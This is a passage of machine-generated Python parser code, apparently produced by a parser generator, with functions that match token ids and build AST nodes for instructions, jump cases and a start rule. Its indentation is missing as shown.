lcl_8 = 29
try:
_py_local_tk = prim__tokens.array[prim__tokens.offset]
if (_py_local_tk.idint is lcl_8):
prim__tokens.offset += 1
else:
_py_local_tk = None
except IndexError:
_py_local_tk = None
lcl_8 = _py_local_tk
_slot_4 = lcl_8
lcl_8 = (_slot_4 is None)
if lcl_8:
lcl_9 = prim__tokens.offset
lcl_9 = (lcl_9, 'quote } not match')
lcl_9 = prim__cons(lcl_9, prim__nil)
lcl_9 = lcl_9
lcl_9 = (False, lcl_9)
lcl_8 = lcl_9
else:
lcl_9 = (_slot_0, _slot_1, _slot_2, _slot_3, _slot_4)
lcl_9 = prim__mk__ast('Instr', lcl_9)
_slot_local__1 = lcl_9
lcl_9 = (True, _slot_local__1)
lcl_8 = lcl_9
lcl_7 = lcl_8
lcl_6 = lcl_7
lcl_10 = lcl_6
lcl_4 = lcl_10
elif (lcl_5 == 39):
lcl_10 = parse_Attrs(prim__state, prim__tokens)
_slot_1_check = lcl_10
lcl_10 = _slot_1_check[0]
lcl_10 = (lcl_10 is False)
if lcl_10:
lcl_10 = _slot_1_check
else:
lcl_6 = _slot_1_check[1]
lcl_6 = lcl_6
_slot_1 = lcl_6
lcl_6 = 28
try:
_py_local_tk = prim__tokens.array[prim__tokens.offset]
if (_py_local_tk.idint is lcl_6):
prim__tokens.offset += 1
else:
_py_local_tk = None
except IndexError:
_py_local_tk = None
lcl_6 = _py_local_tk
_slot_2 = lcl_6
lcl_6 = (_slot_2 is None)
if lcl_6:
lcl_7 = prim__tokens.offset
lcl_7 = (lcl_7, 'quote { not match')
lcl_7 = prim__cons(lcl_7, prim__nil)
lcl_7 = lcl_7
lcl_7 = (False, lcl_7)
lcl_6 = lcl_7
else:
lcl_7 = parse_Instrs(prim__state, prim__tokens)
_slot_3_check = lcl_7
lcl_7 = _slot_3_check[0]
lcl_7 = (lcl_7 is False)
if lcl_7:
lcl_7 = _slot_3_check
else:
lcl_8 = _slot_3_check[1]
lcl_8 = lcl_8
_slot_3 = lcl_8
lcl_8 = 29
try:
_py_local_tk = prim__tokens.array[prim__tokens.offset]
if (_py_local_tk.idint is lcl_8):
prim__tokens.offset += 1
else:
_py_local_tk = None
except IndexError:
_py_local_tk = None
lcl_8 = _py_local_tk
_slot_4 = lcl_8
lcl_8 = (_slot_4 is None)
if lcl_8:
lcl_9 = prim__tokens.offset
lcl_9 = (lcl_9, 'quote } not match')
lcl_9 = prim__cons(lcl_9, prim__nil)
lcl_9 = lcl_9
lcl_9 = (False, lcl_9)
lcl_8 = lcl_9
else:
lcl_9 = (_slot_0, _slot_1, _slot_2, _slot_3, _slot_4)
lcl_9 = prim__mk__ast('Instr', lcl_9)
_slot_local__1 = lcl_9
lcl_9 = (True, _slot_local__1)
lcl_8 = lcl_9
lcl_7 = lcl_8
lcl_6 = lcl_7
lcl_10 = lcl_6
lcl_4 = lcl_10
elif (lcl_5 == 35):
lcl_10 = parse_Attrs(prim__state, prim__tokens)
_slot_1_check = lcl_10
lcl_10 = _slot_1_check[0]
lcl_10 = (lcl_10 is False)
if lcl_10:
lcl_10 = _slot_1_check
else:
lcl_6 = _slot_1_check[1]
lcl_6 = lcl_6
_slot_1 = lcl_6
lcl_6 = 28
try:
_py_local_tk = prim__tokens.array[prim__tokens.offset]
if (_py_local_tk.idint is lcl_6):
prim__tokens.offset += 1
else:
_py_local_tk = None
except IndexError:
_py_local_tk = None
lcl_6 = _py_local_tk
_slot_2 = lcl_6
lcl_6 = (_slot_2 is None)
if lcl_6:
lcl_7 = prim__tokens.offset
lcl_7 = (lcl_7, 'quote { not match')
lcl_7 = prim__cons(lcl_7, prim__nil)
lcl_7 = lcl_7
lcl_7 = (False, lcl_7)
lcl_6 = lcl_7
else:
lcl_7 = parse_Instrs(prim__state, prim__tokens)
_slot_3_check = lcl_7
lcl_7 = _slot_3_check[0]
lcl_7 = (lcl_7 is False)
if lcl_7:
lcl_7 = _slot_3_check
else:
lcl_8 = _slot_3_check[1]
lcl_8 = lcl_8
_slot_3 = lcl_8
lcl_8 = 29
try:
_py_local_tk = prim__tokens.array[prim__tokens.offset]
if (_py_local_tk.idint is lcl_8):
prim__tokens.offset += 1
else:
_py_local_tk = None
except IndexError:
_py_local_tk = None
lcl_8 = _py_local_tk
_slot_4 = lcl_8
lcl_8 = (_slot_4 is None)
if lcl_8:
lcl_9 = prim__tokens.offset
lcl_9 = (lcl_9, 'quote } not match')
lcl_9 = prim__cons(lcl_9, prim__nil)
lcl_9 = lcl_9
lcl_9 = (False, lcl_9)
lcl_8 = lcl_9
else:
lcl_9 = (_slot_0, _slot_1, _slot_2, _slot_3, _slot_4)
lcl_9 = prim__mk__ast('Instr', lcl_9)
_slot_local__1 = lcl_9
lcl_9 = (True, _slot_local__1)
lcl_8 = lcl_9
lcl_7 = lcl_8
lcl_6 = lcl_7
lcl_10 = lcl_6
lcl_4 = lcl_10
elif (lcl_5 == 34):
lcl_10 = parse_Attrs(prim__state, prim__tokens)
_slot_1_check = lcl_10
lcl_10 = _slot_1_check[0]
lcl_10 = (lcl_10 is False)
if lcl_10:
lcl_10 = _slot_1_check
else:
lcl_6 = _slot_1_check[1]
lcl_6 = lcl_6
_slot_1 = lcl_6
lcl_6 = 28
try:
_py_local_tk = prim__tokens.array[prim__tokens.offset]
if (_py_local_tk.idint is lcl_6):
prim__tokens.offset += 1
else:
_py_local_tk = None
except IndexError:
_py_local_tk = None
lcl_6 = _py_local_tk
_slot_2 = lcl_6
lcl_6 = (_slot_2 is None)
if lcl_6:
lcl_7 = prim__tokens.offset
lcl_7 = (lcl_7, 'quote { not match')
lcl_7 = prim__cons(lcl_7, prim__nil)
lcl_7 = lcl_7
lcl_7 = (False, lcl_7)
lcl_6 = lcl_7
else:
lcl_7 = parse_Instrs(prim__state, prim__tokens)
_slot_3_check = lcl_7
lcl_7 = _slot_3_check[0]
lcl_7 = (lcl_7 is False)
if lcl_7:
lcl_7 = _slot_3_check
else:
lcl_8 = _slot_3_check[1]
lcl_8 = lcl_8
_slot_3 = lcl_8
lcl_8 = 29
try:
_py_local_tk = prim__tokens.array[prim__tokens.offset]
if (_py_local_tk.idint is lcl_8):
prim__tokens.offset += 1
else:
_py_local_tk = None
except IndexError:
_py_local_tk = None
lcl_8 = _py_local_tk
_slot_4 = lcl_8
lcl_8 = (_slot_4 is None)
if lcl_8:
lcl_9 = prim__tokens.offset
lcl_9 = (lcl_9, 'quote } not match')
lcl_9 = prim__cons(lcl_9, prim__nil)
lcl_9 = lcl_9
lcl_9 = (False, lcl_9)
lcl_8 = lcl_9
else:
lcl_9 = (_slot_0, _slot_1, _slot_2, _slot_3, _slot_4)
lcl_9 = prim__mk__ast('Instr', lcl_9)
_slot_local__1 = lcl_9
lcl_9 = (True, _slot_local__1)
lcl_8 = lcl_9
lcl_7 = lcl_8
lcl_6 = lcl_7
lcl_10 = lcl_6
lcl_4 = lcl_10
elif (lcl_5 == 38):
lcl_10 = parse_Attrs(prim__state, prim__tokens)
_slot_1_check = lcl_10
lcl_10 = _slot_1_check[0]
lcl_10 = (lcl_10 is False)
if lcl_10:
lcl_10 = _slot_1_check
else:
lcl_6 = _slot_1_check[1]
lcl_6 = lcl_6
_slot_1 = lcl_6
lcl_6 = 28
try:
_py_local_tk = prim__tokens.array[prim__tokens.offset]
if (_py_local_tk.idint is lcl_6):
prim__tokens.offset += 1
else:
_py_local_tk = None
except IndexError:
_py_local_tk = None
lcl_6 = _py_local_tk
_slot_2 = lcl_6
lcl_6 = (_slot_2 is None)
if lcl_6:
lcl_7 = prim__tokens.offset
lcl_7 = (lcl_7, 'quote { not match')
lcl_7 = prim__cons(lcl_7, prim__nil)
lcl_7 = lcl_7
lcl_7 = (False, lcl_7)
lcl_6 = lcl_7
else:
lcl_7 = parse_Instrs(prim__state, prim__tokens)
_slot_3_check = lcl_7
lcl_7 = _slot_3_check[0]
lcl_7 = (lcl_7 is False)
if lcl_7:
lcl_7 = _slot_3_check
else:
lcl_8 = _slot_3_check[1]
lcl_8 = lcl_8
_slot_3 = lcl_8
lcl_8 = 29
try:
_py_local_tk = prim__tokens.array[prim__tokens.offset]
if (_py_local_tk.idint is lcl_8):
prim__tokens.offset += 1
else:
_py_local_tk = None
except IndexError:
_py_local_tk = None
lcl_8 = _py_local_tk
_slot_4 = lcl_8
lcl_8 = (_slot_4 is None)
if lcl_8:
lcl_9 = prim__tokens.offset
lcl_9 = (lcl_9, 'quote } not match')
lcl_9 = prim__cons(lcl_9, prim__nil)
lcl_9 = lcl_9
lcl_9 = (False, lcl_9)
lcl_8 = lcl_9
else:
lcl_9 = (_slot_0, _slot_1, _slot_2, _slot_3, _slot_4)
lcl_9 = prim__mk__ast('Instr', lcl_9)
_slot_local__1 = lcl_9
lcl_9 = (True, _slot_local__1)
lcl_8 = lcl_9
lcl_7 = lcl_8
lcl_6 = lcl_7
lcl_10 = lcl_6
lcl_4 = lcl_10
else:
lcl_10 = (_off_1, 'Instr lookahead failed')
lcl_10 = prim__cons(lcl_10, prim__nil)
lcl_10 = lcl_10
lcl_10 = (False, lcl_10)
lcl_4 = lcl_10
lcl_3 = lcl_4
else:
lcl_10 = (_off_1, 'Instr got EOF')
lcl_10 = prim__cons(lcl_10, prim__nil)
lcl_10 = lcl_10
lcl_10 = (False, lcl_10)
lcl_3 = lcl_10
lcl_1 = lcl_3
elif (lcl_2 == 7):
_py_local_i = prim__tokens.offset
_py_local_t = prim__tokens.array[_py_local_i]
prim__tokens.offset = (_py_local_i + 1)
lcl_10 = _py_local_t
_slot_0 = lcl_10
lcl_10 = 42
try:
_py_local_tk = prim__tokens.array[prim__tokens.offset]
if (_py_local_tk.idint is lcl_10):
prim__tokens.offset += 1
else:
_py_local_tk = None
except IndexError:
_py_local_tk = None
lcl_10 = _py_local_tk
_slot_1 = lcl_10
lcl_10 = (_slot_1 is None)
if lcl_10:
lcl_3 = prim__tokens.offset
lcl_3 = (lcl_3, 'PY not match')
lcl_3 = prim__cons(lcl_3, prim__nil)
lcl_3 = lcl_3
lcl_3 = (False, lcl_3)
lcl_10 = lcl_3
else:
lcl_3 = (_slot_0, _slot_1)
lcl_3 = prim__mk__ast('Instr', lcl_3)
_slot_local__1 = lcl_3
lcl_3 = (True, _slot_local__1)
lcl_10 = lcl_3
lcl_1 = lcl_10
elif (lcl_2 == 22):
_py_local_i = prim__tokens.offset
_py_local_t = prim__tokens.array[_py_local_i]
prim__tokens.offset = (_py_local_i + 1)
lcl_10 = _py_local_t
_slot_0 = lcl_10
lcl_10 = 43
try:
_py_local_tk = prim__tokens.array[prim__tokens.offset]
if (_py_local_tk.idint is lcl_10):
prim__tokens.offset += 1
else:
_py_local_tk = None
except IndexError:
_py_local_tk = None
lcl_10 = _py_local_tk
_slot_1 = lcl_10
lcl_10 = (_slot_1 is None)
if lcl_10:
lcl_3 = prim__tokens.offset
lcl_3 = (lcl_3, 'INT not match')
lcl_3 = prim__cons(lcl_3, prim__nil)
lcl_3 = lcl_3
lcl_3 = (False, lcl_3)
lcl_10 = lcl_3
else:
lcl_3 = (_slot_0, _slot_1)
lcl_3 = prim__mk__ast('Instr', lcl_3)
_slot_local__1 = lcl_3
lcl_3 = (True, _slot_local__1)
lcl_10 = lcl_3
lcl_1 = lcl_10
elif (lcl_2 == 21):
_py_local_i = prim__tokens.offset
_py_local_t = prim__tokens.array[_py_local_i]
prim__tokens.offset = (_py_local_i + 1)
lcl_10 = _py_local_t
_slot_0 = lcl_10
lcl_10 = 44
try:
_py_local_tk = prim__tokens.array[prim__tokens.offset]
if (_py_local_tk.idint is lcl_10):
prim__tokens.offset += 1
else:
_py_local_tk = None
except IndexError:
_py_local_tk = None
lcl_10 = _py_local_tk
_slot_1 = lcl_10
lcl_10 = (_slot_1 is None)
if lcl_10:
lcl_3 = prim__tokens.offset
lcl_3 = (lcl_3, 'ID not match')
lcl_3 = prim__cons(lcl_3, prim__nil)
lcl_3 = lcl_3
lcl_3 = (False, lcl_3)
lcl_10 = lcl_3
else:
lcl_3 = (_slot_0, _slot_1)
lcl_3 = prim__mk__ast('Instr', lcl_3)
_slot_local__1 = lcl_3
lcl_3 = (True, _slot_local__1)
lcl_10 = lcl_3
lcl_1 = lcl_10
else:
lcl_10 = (_off_0, 'Instr lookahead failed')
lcl_10 = prim__cons(lcl_10, prim__nil)
lcl_10 = lcl_10
lcl_10 = (False, lcl_10)
lcl_1 = lcl_10
lcl_0 = lcl_1
else:
lcl_1 = (_off_0, 'Instr got EOF')
lcl_1 = prim__cons(lcl_1, prim__nil)
lcl_1 = lcl_1
lcl_1 = (False, lcl_1)
lcl_0 = lcl_1
return lcl_0
def parse_Instrs(prim__state, prim__tokens):
lcl_0 = parse_Instr(prim__state, prim__tokens)
_slot_0_check = lcl_0
lcl_0 = _slot_0_check[0]
lcl_0 = (lcl_0 is False)
if lcl_0:
lcl_0 = _slot_0_check
else:
lcl_1 = _slot_0_check[1]
lcl_1 = lcl_1
_slot_0 = lcl_1
lcl_1 = (_slot_0,)
lcl_1 = prim__mk__ast('Instrs', lcl_1)
_slot_local__1 = lcl_1
lcl_1 = lr_loop_Instrs(_slot_local__1, prim__state, prim__tokens)
lcl_0 = lcl_1
return lcl_0
def parse_JumpCase(prim__state, prim__tokens):
lcl_0 = prim__tokens.offset
_off_0 = lcl_0
lcl_0 = (len(prim__tokens.array) > (prim__tokens.offset + 0))
if lcl_0:
lcl_2 = prim__tokens.array[(prim__tokens.offset + 0)]
lcl_2 = lcl_2.idint
if (lcl_2 == 33):
_py_local_i = prim__tokens.offset
_py_local_t = prim__tokens.array[_py_local_i]
prim__tokens.offset = (_py_local_i + 1)
lcl_3 = _py_local_t
_slot_0 = lcl_3
lcl_3 = 32
try:
_py_local_tk = prim__tokens.array[prim__tokens.offset]
if (_py_local_tk.idint is lcl_3):
prim__tokens.offset += 1
else:
_py_local_tk = None
except IndexError:
_py_local_tk = None
lcl_3 = _py_local_tk
_slot_1 = lcl_3
lcl_3 = (_slot_1 is None)
if lcl_3:
lcl_4 = prim__tokens.offset
lcl_4 = (lcl_4, 'quote => not match')
lcl_4 = prim__cons(lcl_4, prim__nil)
lcl_4 = lcl_4
lcl_4 = (False, lcl_4)
lcl_3 = lcl_4
else:
lcl_4 = 44
try:
_py_local_tk = prim__tokens.array[prim__tokens.offset]
if (_py_local_tk.idint is lcl_4):
prim__tokens.offset += 1
else:
_py_local_tk = None
except IndexError:
_py_local_tk = None
lcl_4 = _py_local_tk
_slot_2 = lcl_4
lcl_4 = (_slot_2 is None)
if lcl_4:
lcl_5 = prim__tokens.offset
lcl_5 = (lcl_5, 'ID not match')
lcl_5 = prim__cons(lcl_5, prim__nil)
lcl_5 = lcl_5
lcl_5 = (False, lcl_5)
lcl_4 = lcl_5
else:
lcl_5 = (_slot_0, _slot_1, _slot_2)
lcl_5 = prim__mk__ast('JumpCase', lcl_5)
_slot_local__1 = lcl_5
lcl_5 = (True, _slot_local__1)
lcl_4 = lcl_5
lcl_3 = lcl_4
lcl_1 = lcl_3
elif (lcl_2 == 43):
_py_local_i = prim__tokens.offset
_py_local_t = prim__tokens.array[_py_local_i]
prim__tokens.offset = (_py_local_i + 1)
lcl_3 = _py_local_t
_slot_0 = lcl_3
lcl_3 = 32
try:
_py_local_tk = prim__tokens.array[prim__tokens.offset]
if (_py_local_tk.idint is lcl_3):
prim__tokens.offset += 1
else:
_py_local_tk = None
except IndexError:
_py_local_tk = None
lcl_3 = _py_local_tk
_slot_1 = lcl_3
lcl_3 = (_slot_1 is None)
if lcl_3:
lcl_4 = prim__tokens.offset
lcl_4 = (lcl_4, 'quote => not match')
lcl_4 = prim__cons(lcl_4, prim__nil)
lcl_4 = lcl_4
lcl_4 = (False, lcl_4)
lcl_3 = lcl_4
else:
lcl_4 = 44
try:
_py_local_tk = prim__tokens.array[prim__tokens.offset]
if (_py_local_tk.idint is lcl_4):
prim__tokens.offset += 1
else:
_py_local_tk = None
except IndexError:
_py_local_tk = None
lcl_4 = _py_local_tk
_slot_2 = lcl_4
lcl_4 = (_slot_2 is None)
if lcl_4:
lcl_5 = prim__tokens.offset
lcl_5 = (lcl_5, 'ID not match')
lcl_5 = prim__cons(lcl_5, prim__nil)
lcl_5 = lcl_5
lcl_5 = (False, lcl_5)
lcl_4 = lcl_5
else:
lcl_5 = (_slot_0, _slot_1, _slot_2)
lcl_5 = prim__mk__ast('JumpCase', lcl_5)
_slot_local__1 = lcl_5
lcl_5 = (True, _slot_local__1)
lcl_4 = lcl_5
lcl_3 = lcl_4
lcl_1 = lcl_3
else:
lcl_3 = (_off_0, 'JumpCase lookahead failed')
lcl_3 = prim__cons(lcl_3, prim__nil)
lcl_3 = lcl_3
lcl_3 = (False, lcl_3)
lcl_1 = lcl_3
lcl_0 = lcl_1
else:
lcl_1 = (_off_0, 'JumpCase got EOF')
lcl_1 = prim__cons(lcl_1, prim__nil)
lcl_1 = lcl_1
lcl_1 = (False, lcl_1)
lcl_0 = lcl_1
return lcl_0
def parse_JumpCases(prim__state, prim__tokens):
lcl_0 = parse_JumpCase(prim__state, prim__tokens)
_slot_0_check = lcl_0
lcl_0 = _slot_0_check[0]
lcl_0 = (lcl_0 is False)
if lcl_0:
lcl_0 = _slot_0_check
else:
lcl_1 = _slot_0_check[1]
lcl_1 = lcl_1
_slot_0 = lcl_1
lcl_1 = (_slot_0,)
lcl_1 = prim__mk__ast('JumpCases', lcl_1)
_slot_local__1 = lcl_1
lcl_1 = lr_loop_JumpCases(_slot_local__1, prim__state, prim__tokens)
lcl_0 = lcl_1
return lcl_0
def parse_START(prim__state, prim__tokens):
lcl_0 = 0
try:
_py_local_tk = prim__tokens.array[prim__tokens.offset]
if (_py_local_tk.idint is lcl_0):
prim__tokens.offset += 1
else:
_py_local_tk = None
except IndexError:
_py_local_tk = None
lcl_0 = _py_local_tk
_slot_0 = lcl_0
lcl_0 = (_slot_0 is None)
if lcl_0:
lcl_1 = prim__tokens.offset
lcl_1 = (lcl_1, 'BOF not match')
lcl_1 = prim__cons(lcl_1, prim__nil)
lcl_1 = lcl_1
lcl_1 = (False, lcl_1)
lcl_0 = lcl_1
else:
lcl_1 = 2
try:
_py_local_tk = prim__tokens.array[prim__tokens.offset]
if (_py_local_tk.idint is lcl_1):
prim__tokens.offset += 1
else:
_py_local_tk = None
except IndexError:
_py_local_tk = None
lcl_1 = _py_local_tk
_slot_1 = lcl_1
lcl_1 = (_slot_1 is None)
if lcl_1:
lcl_2 = prim__tokens.offset
lcl_2 = (lcl_2, 'quote runtime not match')
lcl_2 = prim__cons(lcl_2, prim__nil)
lcl_2 = lcl_2
lcl_2 = (False, lcl_2)
lcl_1 = lcl_2
else:
lcl_2 = 44
try:
_py_local_tk = prim__tokens.array[prim__tokens.offset]
if (_py_local_tk.idint is lcl_2):
prim__tokens.offset += 1
else:
_py_local_tk = None
except IndexError:
_py_local_tk = None
lcl_2 = _py_local_tk
_slot_2 = lcl_2
lcl_2 = (_slot_2 is None)
if lcl_2:
lcl_3 = prim__tokens.offset
lcl_3 = (lcl_3, 'ID not match')
lcl_3 = prim__cons(lcl_3, prim__nil)
lcl_3 = lcl_3
lcl_3 = (False, lcl_3)
lcl_2 = lcl_3
else:
lcl_3 = prim__tokens.offset
_off_3 = lcl_3
lcl_3 = (len(prim__tokens.array) > (prim__tokens.offset + 0))
if lcl_3:
lcl_5 = prim__tokens.array[(prim__tokens.offset + 0)]
lcl_5 = lcl_5.idint
if (lcl_5 == 24):
lcl_6 = parse_Instrs(prim__state, prim__tokens)
_slot_3_check = lcl_6
lcl_6 = _slot_3_check[0]
lcl_6 = (lcl_6 is False)
if lcl_6:
lcl_6 = _slot_3_check
else:
lcl_7 = _slot_3_check[1]
lcl_7 = lcl_7
_slot_3 = lcl_7
lcl_7 = 1
try:
_py_local_tk = prim__tokens.array[prim__tokens.offset]
if (_py_local_tk.idint is lcl_7):
prim__tokens.offset += 1
else:
_py_local_tk = None
except IndexError:
_py_local_tk = None
lcl_7 = _py_local_tk
_slot_4 = lcl_7
lcl_7 = (_slot_4 is None)
if lcl_7:
lcl_8 = prim__tokens.offset
lcl_8 = (lcl_8, 'EOF not match')
lcl_8 = prim__cons(lcl_8, prim__nil)
lcl_8 = lcl_8
lcl_8 = (False, lcl_8)
lcl_7 = lcl_8
else:
lcl_8 = (_slot_0, _slot_1, _slot_2, _slot_3, _slot_4)
lcl_8 = prim__mk__ast('START', lcl_8)
_slot_local__1 = lcl_8
lcl_8 = (True, _slot_local__1)
lcl_7 = lcl_8
lcl_6 = lcl_7
lcl_4 = lcl_6
elif (lcl_5 == 30):
lcl_6 = parse_Instrs(prim__state, prim__tokens)
_slot_3_check = lcl_6
lcl_6 = _slot_3_check[0]
lcl_6 = (lcl_6 is False)
if lcl_6:
lcl_6 = _slot_3_check
else:
lcl_7 = _slot_3_check[1]
lcl_7 = lcl_7
_slot_3 = lcl_7
lcl_7 = 1
try:
_py_local_tk = prim__tokens.array[prim__tokens.offset]
if (_py_local_tk.idint is lcl_7):
prim__tokens.offset += 1
else:
_py_local_tk = None
except IndexError:
_py_local_tk = None
lcl_7 = _py_local_tk
_slot_4 = lcl_7
lcl_7 = (_slot_4 is None)
if lcl_7:
lcl_8 = prim__tokens.offset
lcl_8 = (lcl_8, 'EOF not match')
lcl_8 = prim__cons(lcl_8, prim__nil)
lcl_8 = lcl_8
lcl_8 = (False, lcl_8)
lcl_7 = lcl_8
else:
lcl_8 = (_slot_0, _slot_1, _slot_2, _slot_3, _slot_4)
lcl_8 = prim__mk__ast('START', lcl_8)
_slot_local__1 = lcl_8
lcl_8 = (True, _slot_local__1)
lcl_7 = lcl_8
lcl_6 = lcl_7
lcl_4 = lcl_6
elif (lcl_5 == 4):
lcl_6 = parse_Instrs(prim__state, prim__tokens)
_slot_3_check = lcl_6
lcl_6 = _slot_3_check[0]
lcl_6 = (lcl_6 is False)
if lcl_6:
lcl_6 = _slot_3_check
else:
lcl_7 = _slot_3_check[1]
lcl_7 = lcl_7
_slot_3 = lcl_7
lcl_7 = 1
try:
_py_local_tk = prim__tokens.array[prim__tokens.offset]
if (_py_local_tk.idint is lcl_7):
prim__tokens.offset += 1
else:
_py_local_tk = None
except IndexError:
_py_local_tk = None
lcl_7 = _py_local_tk
_slot_4 = lcl_7
lcl_7 = (_slot_4 is None)
if lcl_7:
lcl_8 = prim__tokens.offset
lcl_8 = (lcl_8, 'EOF not match')
lcl_8 = prim__cons(lcl_8, prim__nil)
lcl_8 = lcl_8
lcl_8 = (False, lcl_8)
lcl_7 = lcl_8
else:
lcl_8 = (_slot_0, _slot_1, _slot_2, _slot_3, _slot_4)
lcl_8 = prim__mk__ast('START', lcl_8)
_slot_local__1 = lcl_8
lcl_8 = (True, _slot_local__1)
lcl_7 = lcl_8
lcl_6 = lcl_7
lcl_4 = lcl_6
elif (lcl_5 == 15):
lcl_6 = parse_Instrs(prim__state, prim__tokens)
_slot_3_check = lcl_6
lcl_6 = _slot_3_check[0]
lcl_6 = (lcl_6 is False)
if lcl_6:
lcl_6 = _slot_3_check
else:
lcl_7 = _slot_3_check[1]
lcl_7 = lcl_7
_slot_3 = lcl_7
lcl_7 = 1
try:
_py_local_tk = prim__tokens.array[prim__tokens.offset]
if (_py_local_tk.idint is lcl_7):
prim__tokens.offset += 1
else:
_py_local_tk = None
except IndexError:
_py_local_tk = None
lcl_7 = _py_local_tk
_slot_4 = lcl_7
lcl_7 = (_slot_4 is None)
if lcl_7:
lcl_8 = prim__tokens.offset
lcl_8 = (lcl_8, 'EOF not match')
lcl_8 = prim__cons(lcl_8, prim__nil)
lcl_8 = lcl_8
lcl_8 = (False, lcl_8)
lcl_7 = lcl_8
else:
lcl_8 = (_slot_0, _slot_1, _slot_2, _slot_3, _slot_4)
lcl_8 = prim__mk__ast('START', lcl_8)
_slot_local__1 = lcl_8
lcl_8 = (True, _slot_local__1)
lcl_7 = lcl_8
lcl_6 = lcl_7
lcl_4 = lcl_6
elif (lcl_5 == 25):
lcl_6 = parse_Instrs(prim__state, prim__tokens)
_slot_3_check = lcl_6
lcl_6 = _slot_3_check[0]
lcl_6 = (lcl_6 is False)
if lcl_6:
lcl_6 = _slot_3_check
else:
lcl_7 = _slot_3_check[1]
lcl_7 = lcl_7
_slot_3 = lcl_7
lcl_7 = 1
try:
_py_local_tk = prim__tokens.array[prim__tokens.offset]
if (_py_local_tk.idint is lcl_7):
prim__tokens.offset += 1
else:
_py_local_tk = None
except IndexError:
_py_local_tk = None
lcl_7 = _py_local_tk
_slot_4 = lcl_7
lcl_7 = (_slot_4 is None)
if lcl_7:
lcl_8 = prim__tokens.offset
lcl_8 = (lcl_8, 'EOF not match')
lcl_8 = prim__cons(lcl_8, prim__nil)
lcl_8 = lcl_8
lcl_8 = (False, lcl_8)
lcl_7 = lcl_8
else:
lcl_8 = (_slot_0, _slot_1, _slot_2, _slot_3, _slot_4)
lcl_8 = prim__mk__ast('START', lcl_8)
_slot_local__1 = lcl_8
lcl_8 = (True, _slot_local__1)
lcl_7 = lcl_8
lcl_6 = lcl_7
lcl_4 = lcl_6
elif (lcl_5 == 13):
lcl_6 = parse_Instrs(prim__state, prim__tokens)
_slot_3_check = lcl_6
lcl_6 = _slot_3_check[0]
lcl_6 = (lcl_6 is False)
if lcl_6:
lcl_6 = _slot_3_check
else:
lcl_7 = _slot_3_check[1]
lcl_7 = lcl_7
_slot_3 = lcl_7
lcl_7 = 1
try:
_py_local_tk = prim__tokens.array[prim__tokens.offset]
if (_py_local_tk.idint is lcl_7):
prim__tokens.offset += 1
else:
_py_local_tk = None
except IndexError:
_py_local_tk = None
lcl_7 = _py_local_tk
_slot_4 = lcl_7
lcl_7 = (_slot_4 is None)
if lcl_7:
lcl_8 = prim__tokens.offset
lcl_8 = (lcl_8, 'EOF not match')
lcl_8 = prim__cons(lcl_8, prim__nil)
lcl_8 = lcl_8
lcl_8 = (False, lcl_8)
lcl_7 = lcl_8
else:
lcl_8 = (_slot_0, _slot_1, _slot_2, _slot_3, _slot_4)
lcl_8 = prim__mk__ast('START', lcl_8)
_slot_local__1 = lcl_8
lcl_8 = (True, _slot_local__1)
lcl_7 = lcl_8
lcl_6 = lcl_7
lcl_4 = lcl_6
elif (lcl_5 == 12):
lcl_6 = parse_Instrs(prim__state, prim__tokens)
_slot_3_check = lcl_6
lcl_6 = _slot_3_check[0]
lcl_6 = (lcl_6 is False)
if lcl_6:
lcl_6 = _slot_3_check
else:
lcl_7 = _slot_3_check[1]
lcl_7 = lcl_7
_slot_3 = lcl_7
lcl_7 = 1
try:
_py_local_tk = prim__tokens.array[prim__tokens.offset]
if (_py_local_tk.idint is lcl_7):
prim__tokens.offset += 1
else:
_py_local_tk = None
except IndexError:
_py_local_tk = None
lcl_7 = _py_local_tk
_slot_4 = lcl_7
lcl_7 = (_slot_4 is None)
if lcl_7:
lcl_8 = prim__tokens.offset
lcl_8 = (lcl_8, 'EOF not match')
lcl_8 = prim__cons(lcl_8, prim__nil)
lcl_8 = lcl_8
lcl_8 = (False, lcl_8)
lcl_7 = lcl_8
else:
lcl_8 = (_slot_0, _slot_1, _slot_2, _slot_3, _slot_4)
lcl_8 = prim__mk__ast('START', lcl_8)
_slot_local__1 = lcl_8
lcl_8 = (True, _slot_local__1)
lcl_7 = lcl_8
lcl_6 = lcl_7
lcl_4 = lcl_6
elif (lcl_5 == 10):
lcl_6 = parse_Instrs(prim__state, prim__tokens)
_slot_3_check = lcl_6
lcl_6 = _slot_3_check[0]
lcl_6 = (lcl_6 is False)
if lcl_6:
lcl_6 = _slot_3_check
else:
lcl_7 = _slot_3_check[1]
lcl_7 = lcl_7
_slot_3 = lcl_7
lcl_7 = 1
try:
_py_local_tk = prim__tokens.array[prim__tokens.offset]
if (_py_local_tk.idint is lcl_7):
prim__tokens.offset += 1
else:
_py_local_tk = None
except IndexError:
_py_local_tk = None
lcl_7 = _py_local_tk
_slot_4 = lcl_7
lcl_7 = (_slot_4 is None)
if lcl_7:
lcl_8 = prim__tokens.offset
lcl_8 = (lcl_8, 'EOF not match')
lcl_8 = prim__cons(lcl_8, prim__nil)
lcl_8 = lcl_8
lcl_8 = (False, lcl_8)
lcl_7 = lcl_8
else:
lcl_8 = (_slot_0, _slot_1, _slot_2, _slot_3, _slot_4)
lcl_8 = prim__mk__ast('START', lcl_8)
_slot_local__1 = lcl_8
lcl_8 = (True, _slot_local__1)
lcl_7 = lcl_8
lcl_6 = lcl_7
lcl_4 = lcl_6
elif (lcl_5 == 11):
lcl_6 = parse_Instrs(prim__state, prim__tokens)
_slot_3_check = lcl_6
lcl_6 = _slot_3_check[0]
lcl_6 = (lcl_6 is False)
if lcl_6:
lcl_6 = _slot_3_check
else:
lcl_7 = _slot_3_check[1]
lcl_7 = lcl_7
_slot_3 = lcl_7
lcl_7 = 1
try:
_py_local_tk = prim__tokens.array[prim__tokens.offset]
if (_py_local_tk.idint is lcl_7):
prim__tokens.offset += 1
else:
_py_local_tk = None
except IndexError:
_py_local_tk = None
lcl_7 = _py_local_tk
_slot_4 = lcl_7
lcl_7 = (_slot_4 is None)
if lcl_7:
lcl_8 = prim__tokens.offset
lcl_8 = (lcl_8, 'EOF not match')
lcl_8 = prim__cons(lcl_8, prim__nil)
lcl_8 = lcl_8
lcl_8 = (False, lcl_8)
lcl_7 = lcl_8
else:
lcl_8 = (_slot_0, _slot_1, _slot_2, _slot_3, _slot_4)
lcl_8 = prim__mk__ast('START', lcl_8)
_slot_local__1 = lcl_8
lcl_8 = (True, _slot_local__1)
lcl_7 = lcl_8
lcl_6 = lcl_7
lcl_4 = lcl_6
elif (lcl_5 == 37):
lcl_6 = parse_Attrs(prim__state, prim__tokens)
_slot_3_check = lcl_6
lcl_6 = _slot_3_check[0]
